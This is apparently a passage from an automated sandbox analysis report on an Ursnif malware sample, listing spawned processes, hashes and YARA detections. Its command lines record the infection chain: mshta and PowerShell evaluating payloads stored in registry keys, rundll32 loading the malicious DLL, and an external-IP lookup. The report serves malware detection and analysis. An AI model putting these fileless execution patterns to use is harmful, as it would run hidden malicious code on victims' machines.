                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:31:03
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Father
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:31:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:32:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:32:28
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:01:32:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:39
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:44
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:32:47
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:19
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:22
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:23
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\nslookup.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                          Imagebase:0x7ff73b890000
                                                          File size:86528 bytes
                                                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:54
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:34:00
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
